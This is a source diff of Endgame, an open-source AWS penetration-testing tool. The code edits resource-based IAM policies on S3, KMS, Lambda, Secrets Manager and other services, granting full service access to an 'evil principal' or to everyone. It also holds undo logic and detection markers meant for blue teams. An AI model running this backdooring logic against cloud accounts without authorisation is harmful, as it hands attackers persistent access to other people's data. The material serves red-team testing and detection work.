regions = boto3.session.Session().get_available_regions(service)
logger.debug("The service %s does not have available regions. Returning us-east-1 as default")
if not regions:
regions = ["us-east-1"]
return regions

View File

@ -0,0 +1,62 @@
import copy
SUPPORTED_AWS_SERVICES = [
"all",
"acm-pca",
"ec2-ami",
"ebs",
"ecr",
"efs",
"elasticsearch",
"glacier",
"iam",
"kms",
"lambda",
"lambda-layer",
"cloudwatch",
"rds",
"s3",
"secretsmanager",
"ses",
"sns",
"sqs",
]
EMPTY_POLICY = {"Version": "2012-10-17", "Statement": []}
EC2_ASSUME_ROLE_POLICY = {
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Effect": "Allow",
"Sid": ""
}
]
}
LAMBDA_ASSUME_ROLE_POLICY = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
# THIS VARIABLE IS KEY. Let's say you are doing a blue team test, and you are trying to see if your team picked up on
# any modifications that were made using this tool. You can loop through policies that have this SID value to see how
# accurate your detection mechanisms were at picking up vulnerable resource-based policies like this.
# Any IAM Policy with a statement added from this tool will include the value of this variable.
SID_SIGNATURE = "Endgame"
ALLOW_CURRENT_ACCOUNT_SID_SIGNATURE = "AllowCurrentAccount"
# This can be used by blue team to identify API calls in CloudTrail executed by this tool.
USER_AGENT_INDICATOR = "HotDogsAreSandwiches"
def get_empty_policy():
"""Return a copy of an empty policy"""
return copy.deepcopy(EMPTY_POLICY)

View File

@ -0,0 +1,15 @@
"""
When we list resources under a service, instead of returning an ARN or a name, return this object that collects both
and other metadata. Gives us more flexibility.
"""
class ListResourcesResponse:
def __init__(self, service: str, arn: str, name: str, resource_type: str, account_id: str, region: str, note: str = None):
self.service = service
self.arn = arn
self.name = name
self.note = note
self.account_id = account_id
self.region = region
self.resource_type = resource_type

View File

@ -0,0 +1,202 @@
import json
import copy
from endgame.shared.statement_detail import StatementDetail
from endgame.shared import constants
class PolicyDocument:
"""
Holds a policy document
"""
def __init__(
self,
policy: dict,
service: str,
override_action: str = None,
include_resource_block: bool = True,
override_resource_block: str = None,
override_account_id_instead_of_principal: bool = False
):
statement_structure = policy.get("Statement", [])
self.policy = policy
self.original_policy = copy.deepcopy(policy)
self.service = service
self.override_action = override_action
self.include_resource_block = include_resource_block
self.override_resource_block = override_resource_block
self.override_account_id_instead_of_principal = override_account_id_instead_of_principal
self.statements = self._statements(statement_structure)
def __str__(self):
return json.dumps(self.json)
def __repr__(self):
return json.dumps(self.json)
def _statements(self, statement_structure) -> [StatementDetail]:
# Statement can be a list or a string, but we prefer strings for uniformity
if not isinstance(statement_structure, list):
statement_structure = [statement_structure] # pragma: no cover
statements = []
for statement in statement_structure:
statements.append(StatementDetail(
statement=statement,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
override_action=self.override_action,
service=self.service
))
return statements
@property
def sids(self):
statement_ids = []
for statement in self.statements:
statement_ids.append(statement.sid)
return statement_ids
@property
def json(self):
"""Return the Policy in JSON"""
policy = {
"Version": "2012-10-17",
"Statement": []
}
for statement in self.statements:
policy["Statement"].append(json.loads(statement.__str__()))
return policy
def statement_allow_account_id(
self,
account_id: str,
resource_arn: str = "*",
sid_name: str = "AllowCurrentAccount",
principal: str = None,
) -> dict:
if self.override_action:
if "," in self.override_action:
action_block = self.override_action.split(",")
else:
action_block = self.override_action
else:
# If override action is not supplied, just give full access to the whole service 🤡
action_block = [f"{self.service}:*"]
if not principal:
principal = f"arn:aws:iam::{account_id}:root"
statement = {
"Sid": sid_name,
"Action": action_block,
"Effect": "Allow",
"Principal": {
"AWS": [
principal
# f"arn:aws:iam::{current_account_id}:root"
]
},
}
if self.include_resource_block:
statement["Resource"] = get_resource_from_override_settings(
resource_arn=resource_arn, override_resource_block=self.override_resource_block)
allow_current_account = StatementDetail(
statement=statement,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
override_action=self.override_action,
service=self.service
)
return json.loads(allow_current_account.__str__())
def policy_plus_evil_principal(
self,
victim_account_id: str,
evil_principal: str,
resource_arn: str = "*",
) -> dict:
policy = {
"Version": "2012-10-17",
"Statement": []
}
# Add AllowCurrentAccount to statements if there are no statements
if len(self.sids) == 0 or constants.ALLOW_CURRENT_ACCOUNT_SID_SIGNATURE not in self.sids:
allow_current_account_statement = self.statement_allow_account_id(
account_id=victim_account_id,
resource_arn=resource_arn,
)
self.statements.append(StatementDetail(
statement=allow_current_account_statement,
service=self.service,
override_action=self.override_action,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal
))
# If Endgame is not there, add it.
if constants.SID_SIGNATURE not in self.sids:
evil_statement = self.statement_allow_account_id(
account_id=victim_account_id,
principal=evil_principal,
resource_arn=resource_arn,
sid_name=constants.SID_SIGNATURE
)
self.statements.append(StatementDetail(
statement=evil_statement,
service=self.service,
override_action=self.override_action,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal
))
for statement in self.statements:
# Set resources
if self.include_resource_block:
statement.resources = get_resource_from_override_settings(
resource_arn=resource_arn, override_resource_block=self.override_resource_block)
policy["Statement"].append(json.loads(statement.__str__()))
return policy
def policy_minus_evil_principal(
self,
victim_account_id: str,
evil_principal: str,
resource_arn: str = "*",
):
policy = {
"Version": "2012-10-17",
"Statement": []
}
# Add AllowCurrentAccount to statements if there are no statements
if len(self.sids) == 0:
allow_current_account_statement = self.statement_allow_account_id(
account_id=victim_account_id,
resource_arn=resource_arn
)
self.statements.append(StatementDetail(
statement=allow_current_account_statement,
service=self.service,
override_action=self.override_action,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal
))
for statement in self.statements:
# Skip statements that include the evil principal
if statement.sid == constants.SID_SIGNATURE:
continue
# Set resources
if self.include_resource_block:
statement.resources = get_resource_from_override_settings(
resource_arn=resource_arn, override_resource_block=self.override_resource_block)
policy["Statement"].append(json.loads(statement.__str__()))
return policy
def get_resource_from_override_settings(resource_arn: str, override_resource_block: str) -> list:
if not override_resource_block:
resource_block = [resource_arn, f"{resource_arn}/*"]
else:
if "," in override_resource_block:
resource_block = override_resource_block.split(",")
else:
resource_block = override_resource_block
return resource_block

View File

@ -0,0 +1,234 @@
import logging
import botocore
from botocore.exceptions import ClientError
from endgame.shared import utils, constants
from endgame.shared.aws_login import get_boto3_client, get_current_account_id, get_available_regions
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.exposure_via_resource_policies import glacier_vault, sqs, lambda_layer, lambda_function, kms, \
cloudwatch_logs, efs, s3, sns, iam, ecr, secrets_manager, ses, elasticsearch, acm_pca
from endgame.exposure_via_sharing_apis import rds_snapshots, ebs_snapshots, ec2_amis
logger = logging.getLogger(__name__)
class ResourceResults:
"""A list of resources across all services"""
def __init__(self, user_provided_service: str, user_provided_region: str,
current_account_id: str, excluded_names: list = None, excluded_services: list = None, profile: str = None,
cloak: bool = False):
self.user_provided_service = user_provided_service
self.user_provided_region = user_provided_region
self.profile = profile
self.current_account_id = current_account_id
self.cloak = cloak
if excluded_names:
self.excluded_names = excluded_names
else:
self.excluded_names = []
if excluded_services:
self.excluded_services = excluded_services
else:
self.excluded_services = []
self.resources = self._resources()
def _resources(self) -> [ListResourcesResponse]:
"""Get all the resources from all specified services from all specified regions"""
resources = []
if self.user_provided_service == "all":
for supported_service in constants.SUPPORTED_AWS_SERVICES:
if supported_service not in self.excluded_services:
if supported_service != "all":
logger.info("Creating a list of resources for %s" % supported_service)
service_resources = ServiceResourcesMultiRegion(user_provided_service=supported_service,
user_provided_region=self.user_provided_region,
current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
resources.extend(service_resources.resources)
else:
logger.info("Combing through resources for %s" % self.user_provided_service)
service_resources = ServiceResourcesMultiRegion(user_provided_service=self.user_provided_service,
user_provided_region=self.user_provided_region,
current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
resources.extend(service_resources.resources)
return resources
def arns(self) -> [str]:
"""Get all the resource ARNs from all specified services from all specified regions"""
arns = []
if self.user_provided_service == "all":
for supported_service in constants.SUPPORTED_AWS_SERVICES:
if supported_service not in self.excluded_services:
if supported_service != "all":
service_resources = ServiceResourcesMultiRegion(user_provided_service=supported_service,
user_provided_region=self.user_provided_region,
current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
arns.extend(service_resources.arns)
else:
service_resources = ServiceResourcesMultiRegion(user_provided_service=self.user_provided_service,
user_provided_region=self.user_provided_region,
current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
arns.extend(service_resources.arns)
return arns
class ServiceResourcesMultiRegion:
def __init__(
self,
user_provided_service: str,
user_provided_region: str,
current_account_id: str,
profile: str = None,
cloak: bool = False
):
self.user_provided_service = user_provided_service
self.boto_service = utils.get_service_translation(provided_service=user_provided_service)
self.user_provided_region = user_provided_region
self.current_account_id = current_account_id
self.profile = profile
self.cloak = cloak
self.regions = self._regions()
# Save the name of the service for boto3 usage
self.resources = self._resources()
def _regions(self) -> list:
"""List of regions to list things for."""
if self.user_provided_region == "all":
regions = get_available_regions(self.boto_service)
else:
regions = [self.user_provided_region]
return regions
def _resources(self) -> [ListResourcesResponse]:
"""Get all the resources within specified regions"""
resources = []
for region in self.regions:
logger.debug(f"Listing resources for {self.user_provided_service} in {region}")
try:
region_resources = ServiceResourcesSingleRegion(user_provided_service=self.user_provided_service,
region=region,
current_account_id=self.current_account_id,
profile=self.profile,
cloak=self.cloak)
resources.extend(region_resources.resources.resources)
except botocore.exceptions.ClientError as error:
logger.debug(f"The service {self.boto_service} might not exist in the region {region}. Error: {error}")
return resources
@property
def arns(self) -> [str]:
arns = []
for resource in self.resources:
arns.append(resource.arn)
return arns
class ServiceResourcesSingleRegion:
"""A list of all the resources under a particular service in a particular region"""
def __init__(
self,
user_provided_service: str,
region: str,
current_account_id: str,
profile: str = None,
cloak: bool = False
):
self.user_provided_service = user_provided_service
# Save the name of the service for boto3 usage
self.boto_service = utils.get_service_translation(provided_service=user_provided_service)
self.region = region
self.current_account_id = current_account_id
self.client = get_boto3_client(profile=profile, service=self.boto_service, region=self.region, cloak=cloak)
self.resources = self._resources()
@property
def arns(self) -> [str]:
arns = []
results = self.resources
for resource in results.resources:
arns.append(resource.arn)
return arns
def _resources(self) -> [ListResourcesResponse]:
resources = None
if self.user_provided_service == "acm-pca":
resources = acm_pca.AcmPrivateCertificateAuthorities(client=self.client,
current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "ecr":
resources = ecr.EcrRepositories(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "efs":
resources = efs.ElasticFileSystems(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "elasticsearch":
resources = elasticsearch.ElasticSearchDomains(client=self.client,
current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "glacier":
resources = glacier_vault.GlacierVaults(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "iam":
resources = iam.IAMRoles(client=self.client, current_account_id=self.current_account_id, region=self.region)
elif self.user_provided_service == "kms":
resources = kms.KmsKeys(client=self.client, current_account_id=self.current_account_id, region=self.region)
elif self.user_provided_service == "lambda":
resources = lambda_function.LambdaFunctions(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "lambda-layer":
resources = lambda_layer.LambdaLayers(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "cloudwatch":
resources = cloudwatch_logs.CloudwatchResourcePolicies(client=self.client,
current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "s3":
resources = s3.S3Buckets(client=self.client, current_account_id=self.current_account_id, region=self.region)
elif self.user_provided_service == "ses":
resources = ses.SesIdentityPolicies(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "sns":
resources = sns.SnsTopics(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "sqs":
resources = sqs.SqsQueues(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "secretsmanager":
resources = secrets_manager.SecretsManagerSecrets(client=self.client,
current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "rds":
resources = rds_snapshots.RdsSnapshots(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "ebs":
resources = ebs_snapshots.EbsSnapshots(client=self.client, current_account_id=self.current_account_id,
region=self.region)
elif self.user_provided_service == "ec2-ami":
resources = ec2_amis.Ec2Images(client=self.client, current_account_id=self.current_account_id,
region=self.region)
return resources
"""
if region == "all":
logger.info("Listing resources in ALL regions")
regions = get_available_regions(translated_service)
logger.debug(f"Regions available: {', '.join(regions)}")
for region in regions:
list_resources_by_region(service=service, profile=profile, region=self.region, cloak=cloak,
excluded_names=excluded_names, current_account_id=self.current_account_id)
else:
logger.info("Listing resources in %s" % region)
list_resources_by_region(service=service, profile=profile, region=self.region, cloak=cloak,
excluded_names=excluded_names, current_account_id=self.current_account_id)
"""

View File

@ -0,0 +1,64 @@
"""
Classes for managing responses from the various exposure classes. When you run `undo`, `add_myself`, or `set_rbp`,
instead of returning a different dict each time, we will standardize the way in which messages are sent back from those
functions.
"""
import logging
from policy_sentry.util.arns import get_resource_path_from_arn
from endgame.shared.validate import validate_basic_policy_json
from endgame.shared import utils
from endgame.shared.policy_document import PolicyDocument
logger = logging.getLogger(__name__)
class ResponseMessage:
def __init__(self, message: str, operation: str, success: bool, victim_resource_arn: str, evil_principal: str,
original_policy: dict, updated_policy: dict, resource_type: str, resource_name: str, service: str):
self.message = message
self.operation = operation
self.success = success
self.evil_principal = evil_principal
self.victim_resource_arn = victim_resource_arn
self.original_policy = validate_basic_policy_json(original_policy)
self.updated_policy = validate_basic_policy_json(updated_policy)
self.resource_type = resource_type
self.resource_name = resource_name
self.service = service
@property
def updated_policy_sids(self) -> list:
return utils.get_sid_names_with_error_handling(self.updated_policy)
@property
def original_policy_sids(self) -> list:
return utils.get_sid_names_with_error_handling(self.original_policy)
@property
def victim_resource_name(self) -> str:
principal_name = get_resource_path_from_arn(self.evil_principal)
return principal_name
@property
def evil_principal_name(self) -> str:
principal_name = get_resource_path_from_arn(self.evil_principal)
return principal_name
@property
def added_sids(self) -> list:
diff = []
if len(self.updated_policy_sids) > len(self.original_policy_sids):
diff = list(set(self.updated_policy_sids) - set(self.original_policy_sids))
return diff
@property
def removed_sids(self) -> list:
diff = []
if len(self.original_policy_sids) > len(self.updated_policy_sids):
diff = list(set(self.original_policy_sids) - set(self.updated_policy_sids))
return diff
class ResponseGetRbp:
def __init__(self, policy_document, success):
self.policy_document = policy_document
self.success = success

View File

@ -0,0 +1,24 @@
from endgame.shared import utils
def confirm_anonymous_principal():
utils.print_red(r"""
""")
print("\n")
utils.print_red("WARNING:")
confirm = input("You are about to expose resources to the ENTIRE INTERNET. Are you sure you want to do that? [y/N]")
if confirm.lower() == 'y':
return True
else:
return False

View File

@ -0,0 +1,133 @@
import json
from policy_sentry.util.arns import get_account_from_arn
# pylint: disable=too-many-instance-attributes
class StatementDetail:
"""
Analyzes individual statements within a policy
"""
def __init__(
self,
statement: dict,
service: str,
override_action: str = None,
override_account_id_instead_of_principal: bool = False
):
self.json = statement
self.statement = statement
self.sid = statement.get("Sid", "")
self.effect = statement["Effect"]
self.service = service
self.override_action = override_action
self.override_account_id_instead_of_principal = override_account_id_instead_of_principal
self.resources = self._resources()
self.actions = self._actions()
self.aws_principals = self._aws_principals()
self.other_principals = self._other_principals()
self.condition = statement.get("Condition", None)
self.not_action = statement.get("NotAction", None)
self.not_principal = statement.get("NotPrincipal", None)
self.not_resource = statement.get("NotResource", None)
def __str__(self) -> str:
principals_block = {}
result = {
"Sid": self.sid,
"Effect": self.effect,
}
if self.aws_principals:
principals_block["AWS"] = self.aws_principals
if self.other_principals:
principals_block.update(self.other_principals)
result["Principal"] = principals_block
if self.resources:
result["Resource"] = self.resources
if self.actions:
result["Action"] = self.actions
if self.condition:
result["Condition"] = self.condition
if self.not_action:
result["NotAction"] = self.not_action
if self.not_principal:
result["NotPrincipal"] = self.not_principal
if self.not_resource:
result["NotResource"] = self.not_resource
return json.dumps(result)
def _original_actions(self):
"""Holds the actions from the original JSON"""
actions = self.statement.get("Action")
if not actions:
return []
if not isinstance(actions, list):
actions = [actions]
return actions
def _actions(self):
"""Holds the actions in a statement"""
# IAM Roles have a special case where you don't just provide "iam:*" like other resource based policies
# - you have to provide sts:AssumeRole. For that special case, we need to be able to override the action
# in this method.
if self.override_action:
if "," in self.override_action:
action_block = self.override_action.split(",")
else:
action_block = self.override_action
else:
# If override action is not supplied, just give full access to the whole service 🤡
action_block = [f"{self.service}:*"]
return action_block
def _resources(self):
"""Holds the resource ARNs in a statement"""
resources = self.statement.get("Resource")
if not resources:
return []
# If it's a string, turn it into a list
if not isinstance(resources, list):
resources = [resources]
return resources
def _aws_principals(self):
"""Holds the principal ARNs in a statement"""
principals_block = self.statement.get("Principal")
principals = []
if isinstance(principals_block, str):
principals = principals_block
elif isinstance(principals_block, dict):
principals = principals_block.get("AWS", None)
if not principals:
return []
# If it's a string, turn it into a list
if not isinstance(principals, list):
principals = [principals]
if self.override_account_id_instead_of_principal:
updated_principals = []
for principal in principals:
# Case: Principal = *
if principal == "*":
updated_principals.append(principal)
# Case: principal = "arn:aws:iam::999988887777:user/mwahahaha"
elif ":" in principal:
updated_principals.append(get_account_from_arn(principal))
# Case: principal = 999988887777
else:
updated_principals.append(principal)
return updated_principals
else:
return principals
def _other_principals(self) -> dict:
principals_block = self.statement.get("Principal")
other_principals = {}
if isinstance(principals_block, str):
other_principals["*"] = principals_block
else:
for principal_type in principals_block:
if principal_type != "AWS":
other_principals[principal_type] = principals_block[principal_type]
return other_principals

139
endgame/shared/utils.py Normal file
View File

@ -0,0 +1,139 @@
import copy
import logging
from colorama import Fore, Back
from policy_sentry.util.policy_files import get_sid_names_from_policy
from policy_sentry.util.arns import get_account_from_arn
from endgame.shared import constants
logger = logging.getLogger(__name__)
END = "\033[0m"
GREY = "\33[90m"
def get_sid_names_with_error_handling(policy):
try:
sid_names = get_sid_names_from_policy(policy)
# This happens when there is no Sid to be found. That means there is a length of zero.
except TypeError as error:
logger.debug(error)
sid_names = []
except KeyError as error:
logger.debug("There is no SID name in the policy")
logger.debug(error)
sid_names = [""]
return sid_names
def get_service_translation(provided_service: str) -> str:
"""We have to take a user-supplied service (which is named for their understanding) and transform it into the IAM
service. Example is cloudwatch resource policies being `logs`; `logs` is harder to remember than `cloudwatch`."""
if provided_service == "cloudwatch":
actual_service = "logs"
elif provided_service == "lambda-layer":
actual_service = "lambda"
elif provided_service == "elasticsearch":
actual_service = "es"
elif provided_service == "elasticfilesystem":
actual_service = "efs"
elif provided_service == "ebs":
actual_service = "ec2"
elif provided_service == "ec2-ami":
actual_service = "ec2"
else:
actual_service = provided_service
return actual_service
def change_policy_principal_from_arn_to_account_id(policy: dict) -> dict:
"""
Some policies like CloudWatch, SNS, SQS, and Lambda require that you submit the policy using
Principal: {'AWS': '999888777'}
But the policy that is returned from API call includes a full ARN like:
Principal: {'AWS': 'arn:aws:iam::999888777:root'}
This utility function transforms the latter into the former.
"""
temp_statements = policy.get("Statement")
updated_policy = constants.get_empty_policy()
if isinstance(temp_statements, dict):
temp_policy = constants.get_empty_policy()
temp_policy["Statement"].append(temp_policy["Statement"])
else:
temp_policy = copy.deepcopy(policy)
statements = temp_policy.get("Statement")
for statement in statements:
new_statement = {}
try:
aws_principal = statement["Principal"]["AWS"]
new_account_ids = []
# case: statement["Principal"]["AWS"] = list()
if isinstance(aws_principal, list):
for principal in aws_principal:
# case: principal = "*"
if principal == "*":
new_account_ids.append(principal)
# case: principal = "arn:aws:iam::999888777:root"
elif ":" in principal:
new_account_ids.append(get_account_from_arn(principal))
# case: principal = "999888777"
else:
new_account_ids.append(principal)
else:
if aws_principal == "*":
new_account_ids.append(aws_principal)
elif ":" in aws_principal:
new_account_ids.append(get_account_from_arn(aws_principal))
else:
new_account_ids.append(aws_principal)
new_statement = copy.deepcopy(statement)
new_statement["Principal"]["AWS"] = new_account_ids
updated_policy["Statement"].append(copy.deepcopy(new_statement))
# If statement["Principal"]["AWS"] does not exist, just copy the statement to the new policy
except AttributeError:
updated_policy["Statement"].append(statement)
return updated_policy
def print_red(string):
print(f"{Fore.RED}{string}{END}")
def print_yellow(string):
print(f"{Fore.YELLOW}{string}{END}")
def print_blue(string):
print(f"{Fore.BLUE}{string}{END}")
def print_green(string):
print(f"{Fore.GREEN}{string}{END}")
def print_grey(string):
print(f"{GREY}{string}{END}")
# Color code from here: https://stackoverflow.com/a/39452138
def print_remove(service: str, resource_type: str, resource_name: str, principal_type: str, principal_name: str, success: bool):
resource_message_string = f"{service.upper()} {resource_type.capitalize()} {resource_name}"
remove_string = f"Remove {principal_type} {principal_name}"
if success:
success_string = f"{Fore.GREEN}SUCCESS{END}"
else:
success_string = f"{Fore.RED}FAILED{END}"
message = f"{resource_message_string:<}: {remove_string}"
print(f"{message:<80}{success_string:>20}")
# print_blue(f"{message:<80}{success_string:>20}")
def print_add(service: str, resource_type: str, resource_name: str, principal_type: str, principal_name: str, success: bool):
resource_message_string = f"{service.upper()} {resource_type.capitalize()} {resource_name}"
add_string = f"Add {principal_type} {principal_name}"
if success:
success_string = f"{Fore.GREEN}SUCCESS{END}"
else:
success_string = f"{Fore.RED}FAILED{END}"
message = f"{resource_message_string:<}: {add_string}"
# print_blue(f"{message:<80}{success_string:>20}")
print(f"{message:<80}{success_string:>20}")

View File

@ -0,0 +1,81 @@
import logging
import click
from endgame.shared.constants import SUPPORTED_AWS_SERVICES
from policy_sentry.util.arns import get_service_from_arn
from policy_sentry.util.arns import parse_arn_for_resource_type
logger = logging.getLogger(__name__)
def click_validate_supported_aws_service(ctx, param, value):
if value in SUPPORTED_AWS_SERVICES:
return value
else:
raise click.BadParameter(
f"Supply a supported AWS service. Supported services are: {', '.join(SUPPORTED_AWS_SERVICES)}"
)
def click_validate_comma_separated_resource_names(ctx, param, value):
if value is not None:
try:
if value == "":
return []
else:
exclude_resource_names = value.split(",")
return exclude_resource_names
except ValueError:
raise click.BadParameter("Supply the list of resource names to exclude from results in a comma separated string.")
def click_validate_comma_separated_excluded_services(ctx, param, value):
if value is not None:
try:
if value == "":
return []
else:
excluded_services = value.split(",")
for service in excluded_services:
if service not in SUPPORTED_AWS_SERVICES:
raise click.BadParameter(f"The service name {service} is invalid. Please provide a comma "
f"separated list of supported services from the list: "
f"{','.join(SUPPORTED_AWS_SERVICES)}")
return excluded_services
except ValueError:
raise click.BadParameter("Supply the list of resource names to exclude from results in a comma separated string.")
def click_validate_user_or_principal_arn(ctx, param, value):
if validate_user_or_principal_arn(value):
return value
else:
raise click.BadParameter(
f"Please supply a valid IAM principal ARN (a user or a role)"
)
def validate_user_or_principal_arn(arn: str):
if arn.strip('"').strip("'") == "*":
return True
else:
service = get_service_from_arn(arn)
resource_type = parse_arn_for_resource_type(arn)
# Make sure it is an IAM ARN
if service != "iam":
raise Exception("Please supply a valid IAM principal ARN (a user or a role)")
# Make sure that it is a user or a role
elif resource_type not in ["user", "role"]:
raise Exception("Please supply a valid IAM principal ARN (a user or a role)")
else:
return True
def validate_basic_policy_json(policy_json: dict) -> dict:
# Expect Statement in policy
if "Version" not in policy_json or "Statement" not in policy_json:
logger.warning("Policy does not have either 'Version' or 'Statement' block in it.")
policy = {"Version": "2012-10-17", "Statement": []}
return policy
else:
if not isinstance(policy_json.get("Statement"), list):
logger.warning("'Statement' in Policy should be a list (ideally) or a dict")
return policy_json

59
mkdocs.yml Normal file
View File

@ -0,0 +1,59 @@
site_name: Endgame
site_url: https://endgame.readthedocs.io/
repo_url: https://github.com/agnivesh/endgame/
theme: material
use_directory_urls: true
markdown_extensions:
- codehilite
- tables
plugins:
- search
- mkdocstrings:
default_handler: python
handlers:
python:
rendering:
show_source: true
watch:
- endgame/
extra_css:
- custom.css
nav:
- Home: 'index.md'
- Installation: 'installation.md'
- Tutorial: 'tutorial.md'
- Detection: 'detection.md'
- Prevention: 'prevention.md'
- Recommendations To AWS: 'recommendations-to-aws.md'
- Permissions: 'iam-permissions.md'
- "<b>Backdoor Resource Types</b>":
- ACM Private CAs: 'risks/acm-pca.md'
- CloudWatch: 'risks/logs.md'
- Elastic Block Store (EBS): 'risks/ebs.md'
- EC2 Machine Images (AMIs): 'risks/amis.md'
- Elastic Container Registry (ECR): 'risks/ecr.md'
- Elastic File System (EFS): 'risks/efs.md'
- ElasticSearch: 'risks/es.md'
- Glacier Vaults: 'risks/glacier.md'
- IAM Roles: 'risks/iam-roles.md'
- KMS Keys: 'risks/kms.md'
- Lambda Functions: 'risks/lambda-functions.md'
- Lambda Layers: 'risks/lambda-layers.md'
- RDS Snapshots: 'risks/rds-snapshots.md'
- S3 Buckets: 'risks/s3.md'
- Secrets Manager: 'risks/secretsmanager.md'
- SES Authorized Senders: 'risks/ses.md'
- SNS Topics: 'risks/sns.md'
- SQS Queues: 'risks/sqs.md'
- "<b>Contributing</b>":
- Contributing: 'contributing/contributing.md'
- Testing: 'contributing/testing.md'
- "<b>Appendices</b>":
- Terraform Demo Infrastructure: 'appendices/terraform-demo-infrastructure.md'
- ACM PCA Activation: 'appendices/acm-pca-activation.md'
- Roadmap: 'appendices/roadmap.md'
- FAQ: 'appendices/faq.md'
- Resource Policy Primer: 'resource-policy-primer.md'

15
requirements-dev.txt Normal file
View File

@ -0,0 +1,15 @@
pytest==6.2.2
nose==1.3.7
black==20.8b1
bandit==1.7.0
coverage==5.4
pylint==2.6.0
invoke==1.5.0
pandas==1.2.2
openpyxl==3.0.6
moto==1.3.16
mkdocs==1.1.2
mkdocs-material==6.2.8
mkdocs-material-extensions==1.0.1
mkdocstrings==0.14.0
rsa>=4.7 # not directly required, pinned by Snyk to avoid a vulnerability

5
requirements.txt Normal file
View File

@ -0,0 +1,5 @@
click==7.1.2
botocore==1.20.5
boto3==1.17.5
policy_sentry==0.11.5
colorama==0.4.4

31
setup.cfg Normal file
View File

@ -0,0 +1,31 @@
[nosetests]
exe = True
tests = test/, test/command, test/shared, test/exposure_via_resource_policies
verbosity=2
[tool:pytest]
testpaths = test
#verbosity=2
python_files=test/*/test_*.py
#ignore= __pycache__ *.pyc
norecursedirs = .svn _build tmp* __pycache__
# Exclude: __pycache__ / .pyc
[coverage:run]
;include =
; # endgame only
; endgame/*
;source=endgame/*
omit =
# omit anything in a .local directory anywhere
*/.local/*
*/virtualenv/*
*/venv/*
*/.venv/*
*/docs/*
*/examples/*
utils/*
# omit everything in /usr
; /usr/*
# omit this single file
; utils/tirefire.py

50
setup.py Normal file
View File

@ -0,0 +1,50 @@
"""Setup script"""
import setuptools
import os
import re
HERE = os.path.abspath(os.path.dirname(__file__))
VERSION_RE = re.compile(r"""__version__ = ['"]([0-9.]+)['"]""")
TESTS_REQUIRE = ["coverage", "nose", "pytest", "moto[s3]"]
def get_version():
init = open(os.path.join(HERE, "endgame", "bin", "version.py")).read()
return VERSION_RE.search(init).group(1)
def get_description():
return open(
os.path.join(os.path.abspath(HERE), "README.md"), encoding="utf-8"
).read()
setuptools.setup(
name="endgame",
include_package_data=True,
version=get_version(),
author="Kinnaird McQuade",
author_email="kinnairdm@gmail.com",
description="An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or to the entire internet 😈",
long_description=get_description(),
long_description_content_type="text/markdown",
url="https://github.com/salesforce/endgame",
packages=setuptools.find_packages(exclude=["test*"]),
tests_require=TESTS_REQUIRE,
install_requires=[
"botocore",
"boto3",
"click",
"policy_sentry>=0.11.5",
"colorama",
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
entry_points={"console_scripts": "endgame=endgame.bin.cli:main"},
zip_safe=True,
keywords="aws iam security",
python_requires=">=3.7",
)

124
tasks.py Normal file
View File

@ -0,0 +1,124 @@
#!/usr/bin/env python
import sys
import os
import logging
from invoke import task, Collection
BIN = os.path.abspath(os.path.join(os.path.dirname(__file__), "endgame", "bin", "cli.py"))
sys.path.append(
os.path.abspath(
os.path.join(os.path.dirname(__file__), os.path.pardir, "endgame")
)
)
logger = logging.getLogger(__name__)
# services that we will expose in these tests
EXPOSE_SERVICES = [
"iam",
"ecr",
# "secretsmanager",
"lambda"
]
# services to run the list-resources command against
LIST_SERVICES = [
"iam",
"lambda",
"ecr",
"efs",
"secretsmanager",
"s3"
]
EVIL_PRINCIPAL = os.getenv("EVIL_PRINCIPAL")
if not os.getenv("EVIL_PRINCIPAL"):
raise Exception("Please set the EVIL_PRINCIPAL environment variable to the ARN of the rogue principal that you "
"want to give access to.")
# Create the necessary collections (namespaces)
ns = Collection()
test = Collection("test")
ns.add_collection(test)
# def exception_handler(func):
# def inner_function(*args, **kwargs):
# try:
# func(*args, **kwargs)
# except UnexpectedExit as u_e:
# logger.critical(f"FAIL! UnexpectedExit: {u_e}")
# sys.exit(1)
# except Failure as f_e:
# logger.critical(f"FAIL: Failure: {f_e}")
# sys.exit(1)
#
# return inner_function
# BUILD
@task
def build_package(c):
"""Build the policy_sentry package from the current directory contents for use with PyPi"""
c.run('python -m pip install --upgrade setuptools wheel')
c.run('python setup.py -q sdist bdist_wheel')
@task(pre=[build_package])
def install_package(c):
"""Install the package built from the current directory contents (not PyPi)"""
c.run('pip3 install -q dist/endgame-*.tar.gz')
@task
def create_terraform(c):
c.run("make terraform-demo")
@task
def destroy_terraform(c):
c.run("make terraform-destroy")
# @exception_handler
# @task(pre=[create_terraform], post=[destroy_terraform])
# @task
@task(pre=[install_package])
